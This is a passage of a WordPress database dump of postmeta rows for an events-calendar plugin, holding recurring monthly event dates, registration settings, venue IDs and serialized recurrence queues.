fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512642;s:12:\"_EventOrigin\";i:1607512642;s:16:\"protect_children\";i:1607512642;s:13:\"_thumbnail_id\";i:1607512642;s:26:\"_RTECregistrationsDisabled\";i:1607512642;s:17:\"_RTECdeadlineType\";i:1607512642;s:19:\"_RTECwhoCanRegister\";i:1607512642;s:23:\"_RTEClimitRegistrations\";i:1607512642;s:21:\"_RTECmaxRegistrations\";i:1607512642;s:16:\"_EventRecurrence\";i:1607512642;s:17:\"_EventShowMapLink\";i:1607512642;s:13:\"_EventShowMap\";i:1607512642;s:13:\"_EventVenueID\";i:1607512642;s:20:\"_EventCurrencySymbol\";i:1607512642;s:22:\"_EventCurrencyPosition\";i:1607512643;s:10:\"_EventCost\";i:1607512643;s:9:\"_EventURL\";i:1607512643;s:14:\"_EventTimezone\";i:1607512643;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512643;s:16:\"tribe_events_cat\";i:1607537843;}'),(151796,266081,'mec_color',''),(117607,262901,'_RTECregistrationsDisabled','1'),(117608,262901,'_RTECdeadlineType','start'),(117609,262901,'_RTECwhoCanRegister','any'),(117610,262901,'_RTEClimitRegistrations','0'),(117611,262901,'_RTECmaxRegistrations','30'),(117605,262901,'_EventOrigin','events-calendar'),(117612,262901,'boldgrid_hide_page_title','0'),(117613,262901,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"4\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-14\";s:14:\"EventStartDate\";s:19:\"2020-12-10 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-10 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117614,262901,'_EventShowMapLink','1'),(117615,262901,'_EventShowMap','1'),(117616,262901,'_EventVenueID','262507'),(117617,262901,'_EventCurrencySymbol',''),(117618,262901,'_EventCurrencyPosition','prefix'),(117619,262901,'_EventCost',''),(117620,262901,'_EventURL',''),(117621,262901,'_EventTimezone','America/Denver'),(117622,262901,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610650800;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613070000;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615489200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1617908400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620932400;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623351600;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1625770800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628794800;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631214000;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1634238000;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117780,262907,'_EventVenueID','262507'),(117777,262907,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117633,262902,'protect_children',''),(117627,262902,'_EventStartDate','2021-08-12 19:00:00'),(117779,262907,'_EventShowMap','1'),(117628,262902,'_EventStartDateUTC','2021-08-13 01:00:00'),(117629,262902,'_EventEndDate','2021-08-12 20:30:00'),(117778,262907,'_EventShowMapLink','1'),(117630,262902,'_EventEndDateUTC','2021-08-13 02:30:00'),(117631,262902,'_EventDuration','5400'),(117632,262902,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512643;s:12:\"_EventOrigin\";i:1607512643;s:16:\"protect_children\";i:1607512643;s:13:\"_thumbnail_id\";i:1607512643;s:26:\"_RTECregistrationsDisabled\";i:1607512643;s:17:\"_RTECdeadlineType\";i:1607512643;s:19:\"_RTECwhoCanRegister\";i:1607512643;s:23:\"_RTEClimitRegistrations\";i:1607512643;s:21:\"_RTECmaxRegistrations\";i:1607512643;s:16:\"_EventRecurrence\";i:1607512643;s:17:\"_EventShowMapLink\";i:1607512643;s:13:\"_EventShowMap\";i:1607512643;s:13:\"_EventVenueID\";i:1607512643;s:20:\"_EventCurrencySymbol\";i:1607512643;s:22:\"_EventCurrencyPosition\";i:1607512643;s:10:\"_EventCost\";i:1607512643;s:9:\"_EventURL\";i:1607512643;s:14:\"_EventTimezone\";i:1607512643;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512643;s:16:\"tribe_events_cat\";i:1607537843;}'),(117634,262902,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512643;s:12:\"_EventOrigin\";i:1607512643;s:16:\"protect_children\";i:1607512643;s:13:\"_thumbnail_id\";i:1607512643;s:26:\"_RTECregistrationsDisabled\";i:1607512643;s:17:\"_RTECdeadlineType\";i:1607512643;s:19:\"_RTECwhoCanRegister\";i:1607512643;s:23:\"_RTEClimitRegistrations\";i:1607512643;s:21:\"_RTECmaxRegistrations\";i:1607512643;s:16:\"_EventRecurrence\";i:1607512643;s:17:\"_EventShowMapLink\";i:1607512643;s:13:\"_EventShowMap\";i:1607512643;s:13:\"_EventVenueID\";i:1607512643;s:20:\"_EventCurrencySymbol\";i:1607512643;s:22:\"_EventCurrencyPosition\";i:1607512643;s:10:\"_EventCost\";i:1607512643;s:9:\"_EventURL\";i:1607512643;s:14:\"_EventTimezone\";i:1607512643;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512643;s:16:\"tribe_events_cat\";i:1607537843;}'),(151795,266081,'protect_children',''),(117637,262902,'_RTECregistrationsDisabled','1'),(117638,262902,'_RTECdeadlineType','start'),(117639,262902,'_RTECwhoCanRegister','any'),(117640,262902,'_RTEClimitRegistrations','0'),(117641,262902,'_RTECmaxRegistrations','30'),(117635,262902,'_EventOrigin','events-calendar'),(117642,262902,'boldgrid_hide_page_title','0'),(117643,262902,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"4\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-14\";s:14:\"EventStartDate\";s:19:\"2020-12-10 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-10 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117644,262902,'_EventShowMapLink','1'),(117645,262902,'_EventShowMap','1'),(117646,262902,'_EventVenueID','262507'),(117647,262902,'_EventCurrencySymbol',''),(117648,262902,'_EventCurrencyPosition','prefix'),(117649,262902,'_EventCost',''),(117650,262902,'_EventURL',''),(117651,262902,'_EventTimezone','America/Denver'),(117652,262902,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610650800;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613070000;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615489200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1617908400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620932400;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623351600;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1625770800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628794800;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631214000;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1634238000;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(120880,263177,'_EventOrigin','events-calendar'),(120881,263177,'_thumbnail_id','263178'),(120878,263177,'_EventOrigin','events-calendar'),(120879,263177,'_EventOrigin','events-calendar'),(117663,262903,'protect_children',''),(117657,262903,'_EventStartDate','2021-09-09 19:00:00'),(117658,262903,'_EventStartDateUTC','2021-09-10 01:00:00'),(117659,262903,'_EventEndDate','2021-09-09 20:30:00'),(117660,262903,'_EventEndDateUTC','2021-09-10 02:30:00'),(117661,262903,'_EventDuration','5400'),(117662,262903,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512643;s:12:\"_EventOrigin\";i:1607512643;s:16:\"protect_children\";i:1607512643;s:13:\"_thumbnail_id\";i:1607512643;s:26:\"_RTECregistrationsDisabled\";i:1607512643;s:17:\"_RTECdeadlineType\";i:1607512643;s:19:\"_RTECwhoCanRegister\";i:1607512643;s:23:\"_RTEClimitRegistrations\";i:1607512643;s:21:\"_RTECmaxRegistrations\";i:1607512643;s:16:\"_EventRecurrence\";i:1607512643;s:17:\"_EventShowMapLink\";i:1607512643;s:13:\"_EventShowMap\";i:1607512643;s:13:\"_EventVenueID\";i:1607512643;s:20:\"_EventCurrencySymbol\";i:1607512643;s:22:\"_EventCurrencyPosition\";i:1607512643;s:10:\"_EventCost\";i:1607512643;s:9:\"_EventURL\";i:1607512643;s:14:\"_EventTimezone\";i:1607512643;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512643;s:16:\"tribe_events_cat\";i:1607537843;}'),(117664,262903,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512643;s:12:\"_EventOrigin\";i:1607512643;s:16:\"protect_children\";i:1607512643;s:13:\"_thumbnail_id\";i:1607512643;s:26:\"_RTECregistrationsDisabled\";i:1607512643;s:17:\"_RTECdeadlineType\";i:1607512643;s:19:\"_RTECwhoCanRegister\";i:1607512643;s:23:\"_RTEClimitRegistrations\";i:1607512643;s:21:\"_RTECmaxRegistrations\";i:1607512643;s:16:\"_EventRecurrence\";i:1607512643;s:17:\"_EventShowMapLink\";i:1607512643;s:13:\"_EventShowMap\";i:1607512643;s:13:\"_EventVenueID\";i:1607512643;s:20:\"_EventCurrencySymbol\";i:1607512643;s:22:\"_EventCurrencyPosition\";i:1607512643;s:10:\"_EventCost\";i:1607512643;s:9:\"_EventURL\";i:1607512643;s:14:\"_EventTimezone\";i:1607512643;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512643;s:16:\"tribe_events_cat\";i:1607537843;}'),(117667,262903,'_RTECregistrationsDisabled','1'),(117668,262903,'_RTECdeadlineType','start'),(117669,262903,'_RTECwhoCanRegister','any'),(117670,262903,'_RTEClimitRegistrations','0'),(117671,262903,'_RTECmaxRegistrations','30'),(117665,262903,'_EventOrigin','events-calendar'),(117672,262903,'boldgrid_hide_page_title','0'),(117673,262903,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"4\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-14\";s:14:\"EventStartDate\";s:19:\"2020-12-10 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-10 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117674,262903,'_EventShowMapLink','1'),(117675,262903,'_EventShowMap','1'),(117676,262903,'_EventVenueID','262507'),(117677,262903,'_EventCurrencySymbol',''),(117678,262903,'_EventCurrencyPosition','prefix'),(117679,262903,'_EventCost',''),(117680,262903,'_EventURL',''),(117681,262903,'_EventTimezone','America/Denver'),(117682,262903,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610650800;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613070000;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615489200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1617908400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620932400;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623351600;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1625770800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628794800;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631214000;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1634238000;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117693,262904,'protect_children',''),(117763,262907,'boldgrid_hide_page_title','0'),(117687,262904,'_EventStartDate','2021-10-14 19:00:00'),(117688,262904,'_EventStartDateUTC','2021-10-15 01:00:00'),(117689,262904,'_EventEndDate','2021-10-14 20:30:00'),(120888,263177,'_EventEndDateUTC','2021-01-14 03:00:00'),(117690,262904,'_EventEndDateUTC','2021-10-15 02:30:00'),(117691,262904,'_EventDuration','5400'),(117692,262904,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512643;s:12:\"_EventOrigin\";i:1607512643;s:16:\"protect_children\";i:1607512643;s:13:\"_thumbnail_id\";i:1607512643;s:26:\"_RTECregistrationsDisabled\";i:1607512643;s:17:\"_RTECdeadlineType\";i:1607512643;s:19:\"_RTECwhoCanRegister\";i:1607512643;s:23:\"_RTEClimitRegistrations\";i:1607512643;s:21:\"_RTECmaxRegistrations\";i:1607512643;s:16:\"_EventRecurrence\";i:1607512643;s:17:\"_EventShowMapLink\";i:1607512643;s:13:\"_EventShowMap\";i:1607512643;s:13:\"_EventVenueID\";i:1607512643;s:20:\"_EventCurrencySymbol\";i:1607512643;s:22:\"_EventCurrencyPosition\";i:1607512643;s:10:\"_EventCost\";i:1607512643;s:9:\"_EventURL\";i:1607512643;s:14:\"_EventTimezone\";i:1607512643;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512643;s:16:\"tribe_events_cat\";i:1607537843;}'),(117694,262904,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512643;s:12:\"_EventOrigin\";i:1607512643;s:16:\"protect_children\";i:1607512643;s:13:\"_thumbnail_id\";i:1607512643;s:26:\"_RTECregistrationsDisabled\";i:1607512643;s:17:\"_RTECdeadlineType\";i:1607512643;s:19:\"_RTECwhoCanRegister\";i:1607512643;s:23:\"_RTEClimitRegistrations\";i:1607512643;s:21:\"_RTECmaxRegistrations\";i:1607512643;s:16:\"_EventRecurrence\";i:1607512643;s:17:\"_EventShowMapLink\";i:1607512643;s:13:\"_EventShowMap\";i:1607512643;s:13:\"_EventVenueID\";i:1607512643;s:20:\"_EventCurrencySymbol\";i:1607512643;s:22:\"_EventCurrencyPosition\";i:1607512643;s:10:\"_EventCost\";i:1607512643;s:9:\"_EventURL\";i:1607512643;s:14:\"_EventTimezone\";i:1607512643;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512643;s:16:\"tribe_events_cat\";i:1607537843;}'),(117697,262904,'_RTECregistrationsDisabled','1'),(117698,262904,'_RTECdeadlineType','start'),(117699,262904,'_RTECwhoCanRegister','any'),(117700,262904,'_RTEClimitRegistrations','0'),(117701,262904,'_RTECmaxRegistrations','30'),(117695,262904,'_EventOrigin','events-calendar'),(117702,262904,'boldgrid_hide_page_title','0'),(117703,262904,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"4\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-14\";s:14:\"EventStartDate\";s:19:\"2020-12-10 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-10 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117704,262904,'_EventShowMapLink','1'),(117705,262904,'_EventShowMap','1'),(117706,262904,'_EventVenueID','262507'),(117707,262904,'_EventCurrencySymbol',''),(117708,262904,'_EventCurrencyPosition','prefix'),(117709,262904,'_EventCost',''),(117710,262904,'_EventURL',''),(117711,262904,'_EventTimezone','America/Denver'),(117712,262904,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610650800;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613070000;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615489200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1617908400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620932400;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623351600;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1625770800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628794800;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631214000;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1634238000;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117724,262905,'boldgrid_hide_page_title','0'),(120863,263177,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609513573;s:12:\"_EventOrigin\";i:1609513573;s:13:\"_thumbnail_id\";i:1609513848;s:24:\"boldgrid_hide_page_title\";i:1609513573;s:17:\"_EventShowMapLink\";i:1609513573;s:13:\"_EventShowMap\";i:1609513573;s:15:\"_EventStartDate\";i:1609513848;s:13:\"_EventEndDate\";i:1609513848;s:18:\"_EventStartDateUTC\";i:1609513848;s:16:\"_EventEndDateUTC\";i:1609513848;s:14:\"_EventDuration\";i:1609513573;s:20:\"_EventCurrencySymbol\";i:1609513573;s:22:\"_EventCurrencyPosition\";i:1609513573;s:10:\"_EventCost\";i:1609513573;s:9:\"_EventURL\";i:1609513573;s:14:\"_EventTimezone\";i:1609513573;s:18:\"_EventTimezoneAbbr\";i:1609513573;s:27:\"_EventNextPendingRecurrence\";i:1609513573;s:26:\"_RTECregistrationsDisabled\";i:1609513573;s:17:\"_RTECdeadlineType\";i:1609513573;s:19:\"_RTECwhoCanRegister\";i:1609513573;s:23:\"_RTEClimitRegistrations\";i:1609513573;s:21:\"_RTECmaxRegistrations\";i:1609513573;s:16:\"_EventRecurrence\";i:1609513573;s:18:\"_RTECnumRegistered\";i:1609513573;s:13:\"_EventVenueID\";i:1609513573;s:12:\"_dp_original\";i:1609513573;s:16:\"tribe_events_cat\";i:1609540873;s:10:\"_edit_last\";i:1609513648;s:10:\"post_title\";i:1609513648;s:12:\"post_content\";i:1609515673;s:11:\"post_status\";i:1609513848;}'),(120862,263177,'protect_children',''),(120861,263177,'protect_children',''),(120860,263177,'protect_children',''),(120859,263177,'protect_children',''),(120858,263177,'protect_children',''),(120857,263177,'protect_children',''),(120856,263177,'protect_children',''),(120855,263177,'_EventOrigin','events-calendar'),(117738,262905,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117739,262905,'_EventShowMapLink','1'),(117740,262905,'_EventShowMap','1'),(117741,262905,'_EventVenueID','262507'),(117742,262905,'_EventStartDate','2020-12-20 09:00:00'),(117743,262905,'_EventEndDate','2020-12-20 10:15:00'),(117744,262905,'_EventStartDateUTC','2020-12-20 16:00:00'),(117745,262905,'_EventEndDateUTC','2020-12-20 17:15:00'),(117746,262905,'_EventDuration','4500'),(117747,262905,'_EventCurrencySymbol',''),(117748,262905,'_EventCurrencyPosition','prefix'),(117749,262905,'_EventCost',''),(117750,262905,'_EventURL',''),(117751,262905,'_EventTimezone','America/Denver'),(117752,262905,'_EventTimezoneAbbr','MST'),(117753,262907,'protect_children',''),(117754,262907,'_tribe_modified_fields','a:30:{s:16:\"protect_children\";i:1607512856;s:12:\"_EventOrigin\";i:1607512856;s:10:\"_edit_last\";i:1607512872;s:10:\"post_title\";i:1607512872;s:11:\"post_status\";i:1607512968;s:12:\"post_content\";i:1607512968;s:16:\"tribe_events_cat\";i:1607538168;s:26:\"_RTECregistrationsDisabled\";i:1607512968;s:17:\"_RTECdeadlineType\";i:1607512968;s:19:\"_RTECwhoCanRegister\";i:1607512968;s:23:\"_RTEClimitRegistrations\";i:1607512968;s:21:\"_RTECmaxRegistrations\";i:1607512968;s:24:\"boldgrid_hide_page_title\";i:1607512968;s:16:\"_EventRecurrence\";i:1607512968;s:17:\"_EventShowMapLink\";i:1607512968;s:13:\"_EventShowMap\";i:1607512968;s:13:\"_EventVenueID\";i:1607512968;s:15:\"_EventStartDate\";i:1607512968;s:13:\"_EventEndDate\";i:1607512968;s:18:\"_EventStartDateUTC\";i:1607512968;s:16:\"_EventEndDateUTC\";i:1607512968;s:14:\"_EventDuration\";i:1607512968;s:20:\"_EventCurrencySymbol\";i:1607512968;s:22:\"_EventCurrencyPosition\";i:1607512968;s:10:\"_EventCost\";i:1607512968;s:9:\"_EventURL\";i:1607512968;s:14:\"_EventTimezone\";i:1607512968;s:18:\"_EventTimezoneAbbr\";i:1607512968;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513876;s:13:\"_thumbnail_id\";i:1607513875;}'),(117755,262907,'_EventOrigin','events-calendar'),(117756,262907,'_edit_lock','1619286904:2'),(117757,262907,'_edit_last','2'),(117758,262907,'_RTECregistrationsDisabled','1'),(117759,262907,'_RTECdeadlineType','start'),(117760,262907,'_RTECwhoCanRegister','any'),(117761,262907,'_RTEClimitRegistrations','0'),(117762,262907,'_RTECmaxRegistrations','30'),(104116,262441,'_EventOrigin','events-calendar'),(104117,262441,'_EventOrigin','events-calendar'),(104118,262441,'_EventOrigin','events-calendar'),(104119,262441,'_EventOrigin','events-calendar'),(104120,262441,'_EventOrigin','events-calendar'),(104121,262441,'_EventOrigin','events-calendar'),(104122,262441,'_thumbnail_id','262442'),(104115,262441,'_EventOrigin','events-calendar'),(117442,262895,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610650800;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1613070000;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1615489200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1617908400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1620932400;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1623351600;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1625770800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1628794800;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1631214000;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1634238000;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(117438,262895,'_EventCurrencyPosition','prefix'),(117434,262895,'_EventShowMapLink','1'),(117435,262895,'_EventShowMap','1'),(117436,262895,'_EventVenueID','262507'),(117437,262895,'_EventCurrencySymbol',''),(117429,262895,'_RTECwhoCanRegister','any'),(117419,262895,'_EventEndDate','2021-01-14 20:30:00'),(117432,262895,'boldgrid_hide_page_title','0'),(117420,262895,'_EventEndDateUTC','2021-01-15 03:30:00'),(117421,262895,'_EventDuration','5400'),(117422,262895,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512642;s:12:\"_EventOrigin\";i:1607512642;s:16:\"protect_children\";i:1607512642;s:13:\"_thumbnail_id\";i:1607512642;s:26:\"_RTECregistrationsDisabled\";i:1607512642;s:17:\"_RTECdeadlineType\";i:1607512642;s:19:\"_RTECwhoCanRegister\";i:1607512642;s:23:\"_RTEClimitRegistrations\";i:1607512642;s:21:\"_RTECmaxRegistrations\";i:1607512642;s:16:\"_EventRecurrence\";i:1607512642;s:17:\"_EventShowMapLink\";i:1607512642;s:13:\"_EventShowMap\";i:1607512642;s:13:\"_EventVenueID\";i:1607512642;s:20:\"_EventCurrencySymbol\";i:1607512642;s:22:\"_EventCurrencyPosition\";i:1607512642;s:10:\"_EventCost\";i:1607512642;s:9:\"_EventURL\";i:1607512642;s:14:\"_EventTimezone\";i:1607512642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512642;s:16:\"tribe_events_cat\";i:1607537842;}'),(117424,262895,'_tribe_modified_fields','a:20:{s:24:\"boldgrid_hide_page_title\";i:1607512642;s:12:\"_EventOrigin\";i:1607512642;s:16:\"protect_children\";i:1607512642;s:13:\"_thumbnail_id\";i:1607512642;s:26:\"_RTECregistrationsDisabled\";i:1607512642;s:17:\"_RTECdeadlineType\";i:1607512642;s:19:\"_RTECwhoCanRegister\";i:1607512642;s:23:\"_RTEClimitRegistrations\";i:1607512642;s:21:\"_RTECmaxRegistrations\";i:1607512642;s:16:\"_EventRecurrence\";i:1607512642;s:17:\"_EventShowMapLink\";i:1607512642;s:13:\"_EventShowMap\";i:1607512642;s:13:\"_EventVenueID\";i:1607512642;s:20:\"_EventCurrencySymbol\";i:1607512642;s:22:\"_EventCurrencyPosition\";i:1607512642;s:10:\"_EventCost\";i:1607512642;s:9:\"_EventURL\";i:1607512642;s:14:\"_EventTimezone\";i:1607512642;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512642;s:16:\"tribe_events_cat\";i:1607537842;}'),(117427,262895,'_RTECregistrationsDisabled','1'),(117428,262895,'_RTECdeadlineType','start'),(117402,262893,'_EventEndDate','2020-12-10 20:30:00'),(117401,262893,'_EventStartDate','2020-12-10 19:00:00'),(117400,262893,'_EventVenueID','262507'),(117399,262893,'_EventShowMap','1'),(117398,262893,'_EventShowMapLink','1'),(117397,262893,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"4\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-14\";s:14:\"EventStartDate\";s:19:\"2020-12-10 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-10 